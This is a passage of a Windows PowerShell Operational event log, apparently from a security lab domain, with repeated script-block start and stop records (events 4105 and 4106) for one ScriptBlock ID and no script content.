06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472488
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472487
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472486
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472485
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472484
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472483
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472482
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472481
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472480
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472479
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472478
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472477
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472476
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472475
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472474
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472473
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472472
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472471
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472470
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472469
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472468
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472467
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472466
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472465
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472464
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472463
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472462
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472461
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472460
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472459
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472458
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472457
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472456
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472455
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472454
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472453
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472452
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472451
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472450
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472449
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472448
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472447
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472446
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472445
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472444
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472443
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472442
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472441
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472440
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472439
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472438
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472437
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472436
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472435
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472434
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
